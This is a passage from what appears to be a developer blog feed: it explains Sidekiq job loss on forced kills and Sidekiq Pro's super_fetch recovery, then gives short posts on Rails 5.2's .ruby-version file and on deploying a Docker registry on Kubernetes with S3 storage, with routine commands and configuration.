40510 TID-owu1swr1i INFO: Pushed 1 jobs back to Redis
40510 TID-owu1tr5my SleepWorker JID-5d8bf898c36a60a1096cf4d3 INFO: fail: 19.576 sec
40510 TID-owu1swr1i INFO: Bye!</code></pre><p>As we can see, Sidekiq pushed the unfinished job back to the Redis queue when it received a <code>SIGINT</code> signal.</p><p>Let's verify it.</p><pre><code class="language-ruby">&gt;&gt; Sidekiq::Queue.new.size
=&gt; 
1</code></pre><p>Before we move on, let's learn some basics about signals such as <code>SIGINT</code>.</p><h2>A crash course on POSIX signals</h2><p><code>SIGINT</code> is an interrupt signal. It is an alternative to hitting <code>Ctrl-C</code> on the keyboard. When a process is running in the foreground, we can hit <code>Ctrl-C</code> to signal the process to shut down. When the process is running in the background, we can use the <code>kill</code> command to send a <code>SIGINT</code> signal to the process' PID. A process can optionally catch this signal and shut itself down gracefully. If the process does not respect this signal and ignores it, then nothing really happens and the process keeps running. Both <code>INT</code> and <code>SIGINT</code> are identical signals.</p><p>Another useful signal is <code>SIGTERM</code>. It is called the termination signal. A process can either catch it and perform necessary cleanup or just ignore it. Similar to a <code>SIGINT</code> signal, if a process ignores this signal, then the process keeps running. Note that if no signal is supplied to the <code>kill</code> command, <code>SIGTERM</code> is used by default. Both <code>TERM</code> and <code>SIGTERM</code> are identical signals.</p><p><code>SIGTSTP</code> or <code>TSTP</code> is called the terminal stop signal. It is an alternative to hitting <code>Ctrl-Z</code> on the keyboard. This signal causes a process to suspend further execution.</p><p><code>SIGKILL</code> is known as the kill signal. This signal is intended to kill the process immediately and forcefully. A process cannot catch this signal, therefore the process cannot perform cleanup or a graceful shutdown. This signal is used when a process does not respect and respond to both <code>SIGINT</code> and <code>SIGTERM</code> signals. <code>KILL</code>, <code>SIGKILL</code> and <code>9</code> are identical signals.</p><p>There are a lot of other signals besides these, but they are not relevant for this post. Please check them out <a 
href="https://en.wikipedia.org/wiki/Signal_(IPC)#POSIX_signals">here</a>.</p><p>A Sidekiq process respects all of these signals and behaves as we expect. When Sidekiq receives a <code>TERM</code> or <code>SIGTERM</code> signal, it terminates itself gracefully.</p><h2>Back to our example</h2><p>Coming back to our example from above, we had sent a <code>SIGINT</code> signal to the Sidekiq process.</p><pre><code class="language-ruby">$ kill -SIGINT 40510</code></pre><p>On receiving this <code>SIGINT</code> signal, the Sidekiq process with PID 40510 terminated quiet workers, paused the queue and waited for a while to let busy workers finish their jobs. Since our busy SleepWorker did not finish quickly, Sidekiq terminated that busy worker and pushed it back to the queue in Redis. After that, Sidekiq gracefully terminated itself with exit code 0. Note that the default timeout is 8 seconds, for which Sidekiq will wait to let the busy workers finish before it pushes the unfinished jobs back to the queue in Redis. This timeout can be changed with the <code>-t</code> option given at the startup of the Sidekiq process.</p><p>Sidekiq <a href="https://github.com/mperham/sidekiq/wiki/Deployment#overview">recommends</a> sending a <code>TSTP</code> and a <code>TERM</code> together to ensure that the Sidekiq process shuts down safely and gracefully. On receiving a <code>TSTP</code> signal, Sidekiq stops pulling new work and finishes the work which is in progress. The idea is to first send a <code>TSTP</code> signal, wait as long as possible (by default for 8 seconds, as discussed above) to ensure that busy workers finish their jobs, and then send a <code>TERM</code> signal to shut down the process.</p><p>Sidekiq pushes the unprocessed jobs back to Redis when terminated gracefully. This means that Sidekiq pulls the unfinished job and starts processing it again when we restart the Sidekiq process.</p><pre><code class="language-ruby">$ bundle exec sidekiq
45916 TID-ovfq8ll0k INFO: Booting Sidekiq 5.1.3 with redis 
options {:id=&gt;&quot;Sidekiq-server-PID-45916&quot;, :url=&gt;nil}
45916 TID-ovfq8ll0k INFO: Starting processing, hit Ctrl-C to stop
45916 TID-ovfqajol4 SleepWorker JID-5d8bf898c36a60a1096cf4d3 INFO: start
Started A
Finished A
45916 TID-ovfqajol4 SleepWorker JID-5d8bf898c36a60a1096cf4d3 INFO: done: 30.015 sec</code></pre><p>We can see that Sidekiq pulled the previously terminated job with ID <code>5d8bf898c36a60a1096cf4d3</code> and processed that job again.</p><p>So far so good.</p><p>This behavior is implemented using the <a href="https://github.com/mperham/sidekiq/blob/6e79f2a860ae558f2ed52b8917d2fede846c0a50/lib/sidekiq/fetch.rb"><code>basic_fetch</code></a> strategy, which is present in the open source version of Sidekiq.</p><p>Sidekiq uses the <a href="https://redis.io/commands/brpop">BRPOP</a> Redis command to fetch a scheduled job from the queue. When a job is fetched, that job gets removed from the queue and no longer exists in Redis. If the fetched job is processed, then all is good. Also, if the Sidekiq process is terminated gracefully on receiving either a <code>SIGINT</code> or a <code>SIGTERM</code> signal, Sidekiq will push the unfinished jobs back to the queue in Redis.</p><p>But what if the Sidekiq process crashes in the middle of processing that fetched job?</p><p>A process is considered crashed if it does not shut down gracefully. As we discussed before, when we send a <code>SIGKILL</code> signal to a process, the process cannot receive or catch this signal. Because the process cannot shut down gracefully, it crashes.</p><p>When a Sidekiq process crashes, the jobs fetched by that Sidekiq process which are not yet finished are lost forever.</p><p>Let's try to reproduce this scenario.</p><p>We will schedule another job.</p><pre><code class="language-ruby">&gt;&gt; SleepWorker.perform_async(&quot;B&quot;)
=&gt; &quot;37a5ab4139796c4b9dc1ea6d&quot;
&gt;&gt; Sidekiq::Queue.new.size
=&gt; 1</code></pre><p>Now, let's start the Sidekiq process 
and kill it using a <code>SIGKILL</code> or <code>9</code> signal.</p><pre><code class="language-ruby">$ bundle exec sidekiq
47395 TID-ow8q4nxzf INFO: Starting processing, hit Ctrl-C to stop
47395 TID-ow8qba0x7 SleepWorker JID-37a5ab4139796c4b9dc1ea6d INFO: start
Started B
[1]    47395 killed     bundle exec sidekiq</code></pre><pre><code class="language-ruby">$ kill -SIGKILL 47395</code></pre><p>Let's check if Sidekiq had pushed the busy (unprocessed) job back to the queue in Redis before terminating.</p><pre><code class="language-ruby">&gt;&gt; Sidekiq::Queue.new.size
=&gt; 0</code></pre><p>No, it did not.</p><p>The Sidekiq process did not get a chance to shut down gracefully when it received the <code>SIGKILL</code> signal.</p><p>If we restart the Sidekiq process, it cannot fetch that unprocessed job since the job was not pushed back to the queue in Redis at all.</p><pre><code class="language-ruby">$ bundle exec sidekiq
47733 TID-ox1lau26l INFO: Booting Sidekiq 5.1.3 with redis options {:id=&gt;&quot;Sidekiq-server-PID-47733&quot;, :url=&gt;nil}
47733 TID-ox1lau26l INFO: Starting processing, hit Ctrl-C to stop</code></pre><p>Therefore, the job with name argument <code>B</code> and ID <code>37a5ab4139796c4b9dc1ea6d</code> is completely lost. There is no way to get that job back.</p><p>Losing jobs like this may not be a problem for some applications, but for some critical applications it could be a huge issue.</p><p>We faced a similar problem. One of our clients' applications is deployed on a Kubernetes cluster. Our Sidekiq process runs in a Docker container in the Kubernetes <a href="https://kubernetes.io/docs/concepts/workloads/pods/pod">pods</a> which we call <code>background</code> pods.</p><p>Here's a stripped down version of our <a href="https://kubernetes.io/docs/concepts/workloads/controllers/deployment/">Kubernetes deployment</a> manifest which creates a Kubernetes deployment resource. Our Sidekiq process runs in the pods spawned by that deployment 
resource.</p><pre><code class="language-ruby">---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  name: background
spec:
  replicas: 2
  template:
    spec:
      terminationGracePeriodSeconds: 60
      containers:
      - name: background
        image: &lt;%= ENV['IMAGE'] %&gt;
        env:
        - name: POD_TYPE
          value: background
        lifecycle:
          preStop:
            exec:
              command:
              - /bin/bash
              - -l
              - -c
              - for pid in tmp/pids/sidekiq*.pid; do bin/bundle exec sidekiqctl stop $pid 60; done</code></pre><p>When we apply an updated version of this manifest, for, say, changing the Docker image, the running pods are terminated and new pods are created.</p><p>Before terminating the only container in the pod, Kubernetes executes the <code>sidekiqctl stop $pid 60</code> command which we have defined using the <a href="https://kubernetes.io/docs/tasks/configure-pod-container/attach-handler-lifecycle-event/">preStop</a> event handler. Note that Kubernetes sends a <code>SIGTERM</code> signal to the container being terminated inside the pod once the <code>preStop</code> event handler completes. The default termination grace period is 30 seconds and it is configurable. If the container doesn't terminate within the termination grace period, a <code>SIGKILL</code> signal will be sent to forcefully terminate the container.</p><p>The <code>sidekiqctl stop $pid 60</code> command executed in the <code>preStop</code> handler does three things.</p><ol><li>Sends a <code>SIGTERM</code> signal to the Sidekiq process running in the container.</li><li>Waits for 60 seconds.</li><li>Sends a <code>SIGKILL</code> signal to kill the Sidekiq process forcefully if the process has not terminated gracefully yet.</li></ol><p>This worked for us when the count of busy jobs was relatively small.</p><p>When the number of processing jobs is higher, Sidekiq does not get enough time to quiet the busy workers and fails to push some of them 
back on the Redis queue.</p><p>We found that some of the jobs were getting lost when our <code>background</code> pod restarted. We had to restart our <code>background</code> pod for reasons such as updating the Kubernetes deployment manifest, the pod being automatically evicted by Kubernetes due to the host node encountering an OOM (out of memory) issue, etc.</p><p>We tried increasing both <code>terminationGracePeriodSeconds</code> in the deployment manifest as well as the <code>sidekiqctl stop</code> command's timeout. Despite that, we still kept facing the same issue of losing jobs whenever a pod restarted.</p><p>We even tried sending <code>TSTP</code> and then <code>TERM</code> after a timeout relatively longer than 60 seconds. But the pod was getting harshly terminated without gracefully terminating the Sidekiq process running inside it. Therefore we kept losing the busy jobs which were running during the pod termination.</p><h2>Sidekiq Pro's super_fetch</h2><p>We were looking for a way to stop losing our Sidekiq jobs, or a way to recover them reliably, when our <code>background</code> Kubernetes pod restarts.</p><p>We realized that the commercial version of Sidekiq, Sidekiq Pro, offers an additional fetch strategy, <a href="https://github.com/mperham/sidekiq/wiki/Reliability#using-super_fetch"><code>super_fetch</code></a>, which seemed more efficient and reliable compared to the <code>basic_fetch</code> strategy.</p><p>Let's see what difference the <code>super_fetch</code> strategy makes over <code>basic_fetch</code>.</p><p>We will need to use the <code>sidekiq-pro</code> gem, which needs to be purchased. Since the Sidekiq Pro gem is closed source, we cannot fetch it from the default public gem registry, <a href="https://rubygems.org">https://rubygems.org</a>. Instead, we have to fetch it from a private gem registry which we get after purchasing it. We add the following code to our <code>Gemfile</code> and run <code>bundle install</code>.</p><pre><code class="language-ruby">source ENV['SIDEKIQ_PRO_GEM_URL'] do
  gem 
'sidekiq-pro'
end</code></pre><p>To enable <code>super_fetch</code>, we need to add the following code in an initializer, <code>config/initializers/sidekiq.rb</code>.</p><pre><code class="language-ruby">Sidekiq.configure_server do |config|
  config.super_fetch!
end</code></pre><p>Well, that's it. Sidekiq will now use <code>super_fetch</code> instead of <code>basic_fetch</code>.</p><pre><code class="language-ruby">$ bundle exec sidekiq
75595 TID-owsytgvqj INFO: Sidekiq Pro 4.0.2, commercially licensed.  Thanks for your support!
75595 TID-owsytgvqj INFO: Booting Sidekiq 5.1.3 with redis options {:id=&gt;&quot;Sidekiq-server-PID-75595&quot;, :url=&gt;nil}
75595 TID-owsytgvqj INFO: Starting processing, hit Ctrl-C to stop
75595 TID-owsys5imz INFO: SuperFetch activated</code></pre><p>When <code>super_fetch</code> is activated, the Sidekiq process' graceful shutdown behavior is similar to that of <code>basic_fetch</code>.</p><pre><code class="language-ruby">&gt;&gt; SleepWorker.perform_async(&quot;C&quot;)
=&gt; &quot;f002a41393f9a79a4366d2b5&quot;
&gt;&gt; Sidekiq::Queue.new.size
=&gt; 1</code></pre><pre><code class="language-ruby">$ bundle exec sidekiq
76021 TID-ow6kdcca5 INFO: Sidekiq Pro 4.0.2, commercially licensed.  
Thanks for your support!
76021 TID-ow6kdcca5 INFO: Booting Sidekiq 5.1.3 with redis options {:id=&gt;&quot;Sidekiq-server-PID-76021&quot;, :url=&gt;nil}
76021 TID-ow6kdcca5 INFO: Starting processing, hit Ctrl-C to stop
76021 TID-ow6klq2cx INFO: SuperFetch activated
76021 TID-ow6kiesnp SleepWorker JID-f002a41393f9a79a4366d2b5 INFO: start
Started C</code></pre><pre><code class="language-ruby">&gt;&gt; Sidekiq::Queue.new.size
=&gt; 0</code></pre><pre><code class="language-ruby">$ kill -SIGTERM 76021</code></pre><pre><code class="language-ruby">76021 TID-ow6kdcca5 INFO: Shutting down
76021 TID-ow6kdcca5 INFO: Terminating quiet workers
76021 TID-ow6kieuwh INFO: Scheduler exiting...
76021 TID-ow6kdcca5 INFO: Pausing to allow workers to finish...
76021 TID-ow6kdcca5 WARN: Terminating 1 busy worker threads
76021 TID-ow6kdcca5 WARN: Work still in progress [#&lt;struct Sidekiq::Pro::SuperFetch::Retriever::UnitOfWork queue=&quot;queue:default&quot;, job=&quot;{\&quot;class\&quot;:\&quot;SleepWorker\&quot;,\&quot;args\&quot;:[\&quot;C\&quot;],\&quot;retry\&quot;:true,\&quot;queue\&quot;:\&quot;default\&quot;,\&quot;jid\&quot;:\&quot;f002a41393f9a79a4366d2b5\&quot;,\&quot;created_at\&quot;:1525500653.404454,\&quot;enqueued_at\&quot;:1525500653.404501}&quot;, local_queue=&quot;queue:sq|vishal.local:76021:3e64c4b08393|default&quot;&gt;]
76021 TID-ow6kdcca5 INFO: SuperFetch: Moving job from queue:sq|vishal.local:76021:3e64c4b08393|default back to queue:default
76021 TID-ow6kiesnp SleepWorker JID-f002a41393f9a79a4366d2b5 INFO: fail: 13.758 sec
76021 TID-ow6kdcca5 INFO: Bye!</code></pre><pre><code class="language-ruby">&gt;&gt; Sidekiq::Queue.new.size
=&gt; 1</code></pre><p>That looks good. As we can see, Sidekiq moved the busy job back from a private queue to the queue in Redis when it received a <code>SIGTERM</code> signal.</p><p>Now, let's try to kill the Sidekiq process forcefully, without allowing a graceful shutdown, by sending a <code>SIGKILL</code> signal.</p><p>Since Sidekiq was gracefully shut down 
before, if we restart Sidekiq again, it will re-process the pushed-back job with ID <code>f002a41393f9a79a4366d2b5</code>.</p><pre><code class="language-ruby">$ bundle exec sidekiq
76890 TID-oxecurbtu INFO: Sidekiq Pro 4.0.2, commercially licensed.  Thanks for your support!
76890 TID-oxecurbtu INFO: Booting Sidekiq 5.1.3 with redis options {:id=&gt;&quot;Sidekiq-server-PID-76890&quot;, :url=&gt;nil}
76890 TID-oxecurbtu INFO: Starting processing, hit Ctrl-C to stop
76890 TID-oxecyhftq INFO: SuperFetch activated
76890 TID-oxecyotvm SleepWorker JID-f002a41393f9a79a4366d2b5 INFO: start
Started C
[1]    76890 killed     bundle exec sidekiq</code></pre><pre><code class="language-ruby">$ kill -SIGKILL 76890</code></pre><pre><code class="language-ruby">&gt;&gt; Sidekiq::Queue.new.size
=&gt; 0</code></pre><p>It appears that Sidekiq didn't get any chance to push the busy job back to the queue in Redis on receiving the <code>SIGKILL</code> signal.</p><p>So, where is the magic of <code>super_fetch</code>?</p><p>Did we lose our job again?</p><p>Let's restart Sidekiq and see for ourselves.</p><pre><code class="language-ruby">$ bundle exec sidekiq
77496 TID-oum04ghgw INFO: Sidekiq Pro 4.0.2, commercially licensed.  
Thanks for your support!
77496 TID-oum04ghgw INFO: Booting Sidekiq 5.1.3 with redis options {:id=&gt;&quot;Sidekiq-server-PID-77496&quot;, :url=&gt;nil}
77496 TID-oum04ghgw INFO: Starting processing, hit Ctrl-C to stop
77496 TID-oum086w9s INFO: SuperFetch activated
77496 TID-oum086w9s WARN: SuperFetch: recovered 1 jobs
77496 TID-oum08eu3o SleepWorker JID-f002a41393f9a79a4366d2b5 INFO: start
Started C
Finished C
77496 TID-oum08eu3o SleepWorker JID-f002a41393f9a79a4366d2b5 INFO: done: 30.011 sec</code></pre><p>Whoa, isn't that cool?</p><p>See that line where it says <code>SuperFetch: recovered 1 jobs</code>.</p><p>Although the job wasn't pushed back to the queue in Redis, Sidekiq somehow recovered our lost job with ID <code>f002a41393f9a79a4366d2b5</code> and processed it again!</p><p>Interested in learning how Sidekiq did that? Keep on reading.</p><p>Note that, since Sidekiq Pro is closed source, commercial software, we cannot explain <code>super_fetch</code>'s exact implementation details.</p><p>As we discussed in depth before, Sidekiq's <code>basic_fetch</code> strategy uses the <code>BRPOP</code> Redis command to fetch a job from the queue in Redis. It works great to some extent, but it is prone to losing jobs if Sidekiq crashes or does not shut down gracefully.</p><p>On the other hand, Sidekiq Pro offers the <code>super_fetch</code> strategy, which uses the <a href="http://redis.io/commands/rpoplpush">RPOPLPUSH</a> Redis command to fetch a job.</p><p>The <code>RPOPLPUSH</code> Redis command provides a unique approach towards implementing a reliable queue. The <code>RPOPLPUSH</code> command accepts two lists, namely a source list and a destination list. This command atomically returns and removes the last element from the source list, and pushes that element as the first element in the destination list. Atomically means that both pop and push operations are performed as a single operation at the same time; i.e. 
both should succeed, otherwise both are treated as failed.</p><p><code>super_fetch</code> registers a private queue in Redis for each Sidekiq process on start-up. <code>super_fetch</code> atomically fetches a scheduled job from the public queue in Redis and pushes that job into the private queue (or working queue) using the <code>RPOPLPUSH</code> Redis command. Once the job has finished processing, Sidekiq removes that job from the private queue. During a graceful shutdown, Sidekiq moves the unfinished jobs back from the private queue to the public queue. If the shutdown of a Sidekiq process is not graceful, the unfinished jobs of that Sidekiq process remain in its private queue; these are called orphaned jobs. On restarting or starting another Sidekiq process, <code>super_fetch</code> looks for such orphaned jobs in the private queues. If Sidekiq finds orphaned jobs, it re-enqueues them and processes them again.</p><p>It may happen that we have multiple Sidekiq processes running at the same time. If a process among them dies, its unfinished jobs become orphans. <a href="https://github.com/mperham/sidekiq/wiki/Reliability#recovering-jobs">This Sidekiq wiki</a> describes in detail the criteria which <code>super_fetch</code> relies upon for identifying which jobs are orphaned and which jobs are not. If we don't restart or start another process, <code>super_fetch</code> may take from 5 minutes to 3 hours to recover such orphaned jobs. The recommended approach is to restart or start another Sidekiq process to signal <code>super_fetch</code> to look for orphans.</p><p>Interestingly, in older versions of Sidekiq Pro, <code>super_fetch</code> performed checks for orphaned jobs and queues <a href="https://github.com/mperham/sidekiq/issues/3273">every 24 hours</a> at Sidekiq process startup. Due to this, when the Sidekiq process crashed, the orphaned jobs of that process remained unpicked for up to 24 hours until the next restart. This orphan check delay window was later lowered to 1 hour in 
Sidekiq Pro 3.4.1.</p><p>Another fun thing to know is that,there existed two fetch strategies namely<a href="https://github.com/mperham/sidekiq/wiki/Reliability/_compare/71312b1f3880bcee9ff47f59c7516c15657553d8...15776fd781848a36a0ddb24c3f2315202696e30c"><code>reliable_fetch</code></a>and <code>timed_fetch</code>in the older versions of Sidekiq Pro.Apparently, <code>reliable_fetch</code><a href="https://github.com/mperham/sidekiq/wiki/Pro-Reliability-Server#reliable_fetch">did not work with Docker</a>and <code>timed_fetch</code> had asymptotic computational complexity <code>O(log N)</code>,comparatively<a href="https://github.com/mperham/sidekiq/wiki/Pro-Reliability-Server#timed_fetch">less efficient</a>than <code>super_fetch</code>,which has asymptotic computational complexity <code>O(1)</code>.Both of these strategies had been deprecatedin Sidekiq Pro 3.4.0 in favor of <code>super_fetch</code>.Later, both of these strategies had been<a href="https://github.com/mperham/sidekiq/blob/6e79f2a860ae558f2ed52b8917d2fede846c0a50/Pro-4.0-Upgrade.md#whats-new">removed</a>in Sidekiq Pro 4.0and <a href="https://github.com/mperham/sidekiq/wiki/Reliability#notes">are not documented anywhere</a>.</p><h2>Final result</h2><p>We have enabled <code>super_fetch</code> in our application andit seemed to be working without any major issues so far.Our Kubernetes <code>background</code> pods does not seem tobe loosing any jobs when these pods are restarted.</p><p>Update : Mike Pheram, author of Sidekiq, posted following<a href="https://www.reddit.com/r/ruby/comments/8htnpe/increase_reliability_of_background_job_processing">comment</a>.</p><blockquote><p>Faktory provides all of the beanstalkd functionality, including the same reliability, with a nicer Web UI. It's free and OSS.https://github.com/contribsys/faktory http://contribsys.com/faktory/</p></blockquote>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.2 sets version in Gemfile & adds .ruby-version]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5_2-adds-ruby-version-file-and-ruby-version-to-gemfile-by-default"/>
      <updated>2018-05-07T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5_2-adds-ruby-version-file-and-ruby-version-to-gemfile-by-default</id>
<content type="html"><![CDATA[<p>For Ruby developers, it's common to switch between multiple Ruby versions for multiple projects, as per the needs of each project. Sometimes, going back and forth between multiple Ruby versions can be frustrating for the developer. To avoid this we add <a href="https://rvm.io/workflow/projects#project-file-ruby-version">.ruby-version files</a> to our projects so that version manager tools such as <code>rvm</code>, <code>rbenv</code> etc. can easily determine which Ruby version should be used for that particular project.</p><p>Another thing Rails developers have to take care of is ensuring that the Ruby version used to run Rails by the deployment tools is the one that is desired. To ensure that, we <a href="https://devcenter.heroku.com/articles/ruby-versions">add the Ruby version to the Gemfile</a>. This helps bundler install dependencies scoped to the specified Ruby version.</p><h3>Good News! Rails 5.2 makes our work easy.</h3><p>In Rails 5.2, <a href="https://github.com/rails/rails/pull/30016">changes have been made</a> to introduce a <code>.ruby-version</code> file and also add the Ruby version to the Gemfile by default when creating an app.</p><p>Let's create a new project with Ruby 2.5.</p><pre><code class="language-ruby">$ rvm list default

Default Ruby (for new shells)
   ruby-2.5 [ x86_64 ]

$ rails new my_new_app</code></pre><p>In our new project, we should be able to see <code>.ruby-version</code> in the root directory, and it will contain the value <code>2.5</code>. Also, we should see the following line in the Gemfile.</p><pre><code class="language-ruby">ruby &quot;2.5&quot;</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Deploying Docker Registry on Kubernetes using S3 Storage]]></title>
       <author><name>Rahul Mahale</name></author>
      <link href="https://www.bigbinary.com/blog/deploying-docker-registry-on-kubernetes-using-s3-storage"/>
      <updated>2018-05-03T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/deploying-docker-registry-on-kubernetes-using-s3-storage</id>
<content type="html"><![CDATA[<p>In today's era of containerization, no matter which container runtime we are using, we need an image to run the container. Docker images are stored on container registries like Docker Hub (cloud), Google Container Registry (GCR), AWS ECR, quay.io etc.</p><p>We can also self-host a Docker registry on any Docker platform. In this blog post, we will see how to deploy a Docker registry on Kubernetes using the S3 storage driver.</p><h4>Prerequisites:</h4><ul><li><p>Access to a working Kubernetes cluster.</p></li><li><p>Understanding of <a href="http://kubernetes.io/">Kubernetes</a> terms like <a href="http://kubernetes.io/docs/user-guide/pods/">pods</a>, <a href="http://kubernetes.io/docs/user-guide/deployments/">deployments</a>, <a href="https://kubernetes.io/docs/concepts/services-networking/service/">services</a>, <a href="https://kubernetes.io/docs/tasks/configure-pod-container/configure-pod-configmap/">configmap</a> and <a href="https://kubernetes.io/docs/concepts/services-networking/ingress/">ingress</a>.</p></li></ul><p>As per the Docker registry <a href="https://docs.docker.com/registry/deploying/">documentation</a>, we can simply start the registry using the <code>registry</code> Docker image.</p><p>The basic parameters when deploying a production registry are:</p><ul><li>Authentication</li><li>SSL</li><li>Storage</li></ul><p>We will use <strong>htpasswd</strong> authentication for this post, though the registry image supports <strong>silly</strong> and <strong>token</strong>-based authentication as well.</p><p>The Docker registry requires an SSL certificate and key. We will use a Kubernetes service, which terminates SSL at the ELB level using annotations.</p><p>For registry storage, we can use filesystem, s3, azure, swift etc. For the complete list of options please visit the <a href="https://docs.docker.com/registry/configuration/#storagedocker">docker site</a>.</p><p>We need to store the Docker images pushed to the registry. We will use S3 to store these images.</p><h4>Steps for deploying the registry on Kubernetes</h4><p>Get the <code>ARN</code> of the SSL certificate to be used for SSL.</p><p>If you don't have the SSL certificate on AWS IAM, upload it using the following command.</p><pre><code class="language-bash">$ aws iam upload-server-certificate --server-certificate-name registry --certificate-body file://registry.crt --private-key file://key.pem</code></pre><p>Get the <code>arn</code> for the certificate using the command.</p><pre><code class="language-bash">$ aws iam get-server-certificate --server-certificate-name registry  | grep Arn</code></pre><p>Create an S3 bucket, which will be used to store the Docker images, using s3cmd or aws s3.</p><pre><code class="language-bash">$ s3cmd mb s3://myregistry
Bucket 's3://myregistry/' created</code></pre><p>Create a separate namespace, configmap, deployment and service for the registry using the following templates.</p><pre><code class="language-yaml">---
apiVersion: v1
kind: Namespace
metadata:
  name: container-registry
---
apiVersion: v1
kind: ConfigMap
metadata:
  name: auth
  namespace: container-registry
data:
  htpasswd: |
    admin:$2y$05$TpZPzI7U7cr3cipe6jrOPe0bqohiwgEerEB6E4bFLsUf7Bk.SEBRi
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  labels:
    app: registry
  name: registry
  namespace: container-registry
spec:
  replicas: 1
  strategy:
    type: RollingUpdate
  template:
    metadata:
      labels:
        app: registry
    spec:
      containers:
        - env:
            - name: REGISTRY_AUTH
              value: htpasswd
            - name: REGISTRY_AUTH_HTPASSWD_PATH
              value: /auth/htpasswd
            - name: REGISTRY_AUTH_HTPASSWD_REALM
              value: Registry Realm
            - name: REGISTRY_STORAGE
              value: s3
            - name: REGISTRY_STORAGE_S3_ACCESSKEY
              value: &lt;your-s3-access-key&gt;
            - name: REGISTRY_STORAGE_S3_BUCKET
              value: &lt;your-registry-bucket&gt;
            - name: REGISTRY_STORAGE_S3_REGION
              value: us-east-1
            - name: REGISTRY_STORAGE_S3_SECRETKEY
              value: &lt;your-secret-s3-key&gt;
          image: registry:2
          name: registry
          ports:
            - containerPort: 5000
          volumeMounts:
            - name: auth
              mountPath: /auth
      volumes:
        - name: auth
          configMap:
            name: auth
---
apiVersion: v1
kind: Service
metadata:
  annotations:
    service.beta.kubernetes.io/aws-load-balancer-ssl-cert: &lt;your-iam-certificate-arn&gt;
    service.beta.kubernetes.io/aws-load-balancer-instance-protocol: http
    service.beta.kubernetes.io/aws-load-balancer-ssl-ports: &quot;443&quot;
  labels:
    app: registry
  name: registry
  namespace: container-registry
spec:
  ports:
    - name: &quot;443&quot;
      port: 443
      targetPort: 5000
  selector:
    app: registry
  type: LoadBalancer</code></pre><p>Let's launch these manifests using <code>kubectl apply</code>.</p><pre><code class="language-bash">$ kubectl apply -f registry-namespace.yml registry-configmap.yml registry-deployment.yaml registry-service.yml
namespace &quot;registry&quot; created
configmap &quot;auth&quot; created
deployment &quot;registry&quot; created
service &quot;registry&quot; created</code></pre><p>Now that we have created the registry, we should map DNS to the web service ELB endpoint. We can get the web service ELB endpoint using the following command.</p><pre><code class="language-bash">$ kubectl -n registry get svc registry -o wide
NAME       CLUSTER-IP      EXTERNAL-IP                                                               PORT(S)         AGE       SELECTOR
registry   100.71.250.56   abcghccf8540698e8bff782799ca8h04-1234567890.us-east-2.elb.amazonaws.com   443:30494/TCP   1h        app=registry</code></pre><p>We will point DNS to this ELB endpoint with the domain registry.myapp.com.</p><p>Once the registry is running, it's time to push an image to it.</p><p>First, pull an image or build one locally to push.</p><p>On the local machine, run the following commands:</p><pre><code class="language-bash">$ docker pull busybox
latest: Pulling from busybox
f9ea5e501ad7: Pull complete
ac3f08b78d4e: Pull complete
Digest: sha256:da268b65d710e5ca91271f161d0ff078dc63930bbd6baac88d21b20d23b427ec
Status: Downloaded newer image for busybox:latest</code></pre><p>Now log in to our registry using the following command.</p><pre><code class="language-bash">$ sudo docker login registry.myapp.com
Username: admin
Password:
Login Succeeded</code></pre><p>Now tag the image to point it to our registry using the <code>docker tag</code> command.</p><pre><code class="language-bash">$ sudo docker tag busybox registry.myapp.com/my-app:latest</code></pre><p>Once the image is tagged, we are good to push.</p><p>Let's push the image using the <code>docker push</code> command.</p><pre><code class="language-bash">$ sudo docker push registry.myapp.com/my-app:latest
The push refers to a repository [registry.myapp.com/my-app]
05732a3f47b5: Pushed
30de36c4bd15: Pushed
5237590c0d08: Pushed
latest: digest: sha256:f112e608b2639b21498bd4dbca9076d378cc216a80d52287f7f0f6ea6ad739ab size: 205</code></pre><p>We were successfully able to push an image to a registry running on Kubernetes and stored on S3. 
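</p><p>As an aside, once an image is pushed we can also sanity-check the registry over its HTTP API v2. Below is a minimal Ruby sketch of such a check; the registry host and credentials are the placeholder values used in this post, and the actual HTTP call is left commented out since it needs a reachable registry.</p>

```ruby
require "net/http"
require "uri"

# Placeholder registry host from this post -- replace with your own.
REGISTRY_HOST = "registry.myapp.com"

# Build an authenticated GET request against the Docker Registry HTTP API v2.
def registry_get(path, user:, password:)
  uri = URI("https://#{REGISTRY_HOST}#{path}")
  request = Net::HTTP::Get.new(uri)
  request.basic_auth(user, password)
  [uri, request]
end

# /v2/_catalog lists the repositories the registry knows about.
uri, request = registry_get("/v2/_catalog", user: "admin", password: "password")
puts uri
# To actually perform the call against a live registry:
# Net::HTTP.start(uri.host, uri.port, use_ssl: true) { |http| puts http.request(request).body }
```

<p>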
Let's verify if it exists on S3.</p><p>Navigate to our S3 bucket and we can see that the Docker registry repository <code>busybox</code> has been created.</p><pre><code class="language-bash">$ s3cmd ls s3://myregistry/docker/registry/repositories/
DIR   s3://myregistry/docker/registry/repositories/busybox/</code></pre><p>All our image-related files are stored on S3.</p><p>In this way, we can self-host a container registry on Kubernetes, backed by S3 storage.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.6 added option to raise exception in Kernel#system]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-6-added-option-to-raise-exception-in-kernel-system"/>
      <updated>2018-04-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-6-added-option-to-raise-exception-in-kernel-system</id>
<content type="html"><![CDATA[<p>We write scripts to automate the setup and deployment of Rails applications. In those scripts, in many places, we need to run system commands like <code>bundle install</code>, <code>rake db:create</code>, <code>rake db:migrate</code> and many more.</p><p>Let's suppose we need to run migrations using <code>rake db:migrate</code> in a Rails project setup script. We can use the <code>Kernel#system</code> method.</p><pre><code class="language-ruby">irb&gt; system('rake db:migrate')</code></pre><h4>Ruby 2.5.0</h4><p>Executing <code>system</code> returns <code>true</code> or <code>false</code>. Another characteristic of <code>system</code> is that it swallows exceptions.</p><p>Let's suppose our migrations run successfully. In this case the <code>system</code> command for running migrations will return true.</p><pre><code class="language-ruby">irb&gt; system('rake db:migrate')
